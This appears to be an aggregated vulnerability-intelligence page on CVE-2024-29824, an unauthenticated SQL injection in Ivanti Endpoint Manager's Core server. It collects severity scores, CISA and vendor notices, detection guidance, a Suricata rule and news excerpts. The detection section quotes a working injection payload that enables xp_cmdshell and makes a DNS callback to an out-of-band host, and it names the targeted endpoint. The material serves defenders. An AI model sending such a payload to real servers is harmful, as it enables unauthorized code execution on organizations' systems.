CVE-2024-29824
Published: 2024-05-31
Priority: P1 · 92 (high) · CVSS 3.1 base score 8.8
Vector: AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2024-10-23
Exploited in the wild
EPSS: 99.95% (100.0th percentile)
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | endpoint_manager | < 2022 | 2022 |
| ivanti | endpoint_manager | — | — |
| ivanti | epm | 2022 SU5 – 2022 SU5 | — |
Detection & IOCs (extracted from sources)
- Command observed in the public template: `GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--`
- Review MS SQL logs for evidence of xp_cmdshell being used to obtain command execution on Ivanti EPM servers.
- The SQL injection payload targets PatchBiz.dll via the EPM Core server; monitor for SQLi patterns in traffic to this component.
- Detect exploitation attempts by monitoring POST requests to /WSStatusEvents/EventHandler.asmx with a SOAP content-type whose body contains SQL injection strings (e.g., sp_configure, xp_cmdshell).
- A Check Point IPS signature is available for this vulnerability; deploy the named rule for network-level detection.
- The Nuclei template confirms exploitation by matching 'UpdateStatusEventsResponse' in the HTTP response body together with a DNS interaction via interactsh, indicating successful xp_cmdshell execution.
- Exploitation requires the attacker to be on the same network as the Ivanti EPM Core server (adjacent network attack vector, AV:A); this is not a remotely exploitable vulnerability from the internet.
CVSS provenance

| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | 3.0 | 9.6 | CRITICAL | CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H |
| vulncheck | — | 8.8 | HIGH | — |
| cisa | — | 8.8 | HIGH | — |
GHSA
GHSA-qr27-wgh8-6hcg · ghsa_unreviewed · 2024-05-31 · CRITICAL · CWE-89
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
VulnCheck
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability · vulncheck · 2024 · CVSS 8.8 (HIGH) · CWE-89
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
Affected: Ivanti Endpoint Manager (EPM)
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-19&host_type=src&vulnerability=cve-2024-29824; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-20&host_type=src&vulnerability=cve-2024-29824; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-06-21&host_type=src&vuln
CISA
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability · cisa · 2024-10-02 · CVSS 8.8 (HIGH) · CWE-89
Affected: Ivanti Endpoint Manager (EPM)
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://forums.ivanti.com/s/article/Security-Advisory-May-2024 ; https://nvd.nist.gov/vuln/detail/CVE-2024-29824
Remediation Due Date: 2024-10-23
Ivanti
Ivanti Endpoint Manager (EPM) SQL Injection Vulnerability · vendor_ivanti · 2024-10-02 · CVSS 8.8 (HIGH)
Ivanti Endpoint Manager (EPM) contains a SQL injection vulnerability in Core server that allows an unauthenticated attacker within the same network to execute arbitrary code.
CVE IDs: CVE-2024-29824
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Remediation Due Date: 2024-10-23
Suricata
ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824) · suricata · 2024-10-02 · CVSS 8.8 (HIGH)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Ivanti EPM SQL Injection (CVE-2024-29824)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/WSStatusEvents/EventHandler.asmx"; fast_pattern; http.content_type; content:"application/soap+xml"; http.request_body; content:"md5="; pcre:"/^[^\x3c]*?(?:\x3b|\x0a|\x26|\x60|\x7c|\x24)/R"; reference:url,www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/; reference:cve,2024-29824; classtype:web-application-attack; sid:2056391; rev:1; metadata:affected_product Ivanti, attack_target Server, tls_state TLSDecrypt, created_at 2024_10_02, cve CVE_2024_29824, deployme
Metasploit
Ivanti EPM RecordGoodApp SQLi RCE · metasploit
Ivanti Endpoint Manager (EPM) 2022 SU5 and prior are vulnerable to unauthenticated SQL injection which can be leveraged to achieve unauthenticated remote code execution.
Nuclei
Ivanti EPM - Remote Code Execution · nuclei · CVSS 8.8 (HIGH)
An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
Template:

```yaml
id: CVE-2024-29824

info:
  name: Ivanti EPM - Remote Code Execution
  author: DhiyaneshDK
  severity: critical
  description: |
    An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.
  impact: |
    Attackers can execute arbitrary code on the Ivanti EPM server, leading to complete system compromise.
  remediation: |
    Apply security updates for Ivanti EPM that address CVE-2024-29824.
  reference:
    - https://github.com/horizon3ai/CVE-2024-29824
    - https://nvd.nist.gov/vu
```
Bleepingcomputer
CISA: Recently patched Ivanti EPM flaw now actively exploited · blogs_bleepingcomputer · 2026-03-10 · CVE-2026-1603 · CVSS 8.6 (HIGH)
By Sergiu Gatlan
CISA flagged a high-severity Ivanti Endpoint Manager (EPM) vulnerability as actively exploited in attacks and ordered U.S. federal agencies to patch systems within three weeks.
Ivanti's EPM software is an all-in-one endpoint management solution for managing client devices across Windows, macOS, Linux, Chrome OS, and IoT platforms.
Tracked as CVE-2026-1603, this security flaw can be exploited by remote threat actors without privileges to bypass authentication and steal credential data in low-complexity cross-site scripting attacks that require no user interaction.
Ivanti patched the vulnerability one month ago, when it released Ivanti EPM 2024 SU5, which also addresses an SQL injection flaw that allows
Bleepingcomputer
Ivanti warns of critical Endpoint Manager code execution flaw · blogs_bleepingcomputer · 2025-12-09 · CVSS 9.6 (CRITICAL)
By Sergiu Gatlan
American IT software company Ivanti warned customers today to patch a newly disclosed vulnerability in its Endpoint Manager (EPM) solution that could allow attackers to execute code remotely.
Ivanti delivers system and IT asset management solutions to over 40,000 companies via a network of more than 7,000 organizations worldwide. The company's EPM software is an all-in-one endpoint management tool for managing client devices across popular platforms, including Windows, macOS, Linux, Chrome OS, and IoT.
Tracked as CVE-2025-10573, this critical security flaw can be exploited by remote, unauthenticated threat actors to execute arbitrary JavaScript code through low-complexity cross-site scripting attacks tha
Fortinet
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA | FortiGuard Labs · blogs_fortinet · 2024-10-11 · CVSS 7.2 (HIGH)
FORTIGUARD LABS THREAT RESEARCH
By Faisal Abdul Malik Qureshi, John Simmons, Jared Betts, Luca Pugliese, Trent Healy, Ken Evans and Robert Reyes | October 11, 2024
Affected Platforms: Ivanti Cloud Services Appliance version 4.6 and prior
Impacted Users: Any organization
Impact: Remote attackers gain control of the vulnerable systems
Severity Level: Critical
Today FortiGuard Labs is releasing this blog post about a case where an advanced adversary was observed exploiting three vulnerabilities affecting the Ivanti Cloud Services Appli
Checkpoint
7th October – Threat Intelligence Report · blogs_checkpoint · 2024-10-07 · CVE-2024-45519
For the latest discoveries in cyber research for the week of 7th October, please download our Threat Intelligence Bulletin.
TOP ATTACKS AND BREACHES
Chinese state-sponsored hackers, dubbed “Salt Typhoon”, infiltrated US telecom companies such as Verizon, AT&T, and Lumen Technologies. The attackers gained access to systems used for court-authorized wiretaps, potentially remaining undetected for months while collecting sensitive information.
French press agency AFP has di
Bleepingcomputer
Critical Ivanti RCE flaw with public exploit now used in attacks · blogs_bleepingcomputer · 2024-10-02 · CVE-2024-29824 · CVSS 8.8 (HIGH)
By Sergiu Gatlan
CISA warned today that a critical Ivanti vulnerability that can let threat actors gain remote code execution on vulnerable Endpoint Manager (EPM) appliances is now actively exploited in attacks.
Ivanti EPM is an all-in-one endpoint management solution that helps admins manage client devices on various platforms, including Windows, macOS, Chrome OS, and IoT operating systems.
Tracked as CVE-2024-29824, this SQL injection vulnerability in Ivanti EPM's Core server can be exploited by unauthenticated attackers within the same network to execute arbitrary code on unpatched systems.
Ivanti released security updates to patch this security flaw in May, when it also addressed five other remote code execution bu
Greynoiseio
NoiseLetter June 2024 · blogs_greynoiseio
Timeline
- 2024-05-31: Published
- 2024-10-02: Added to CISA KEV
- Exploited in the wild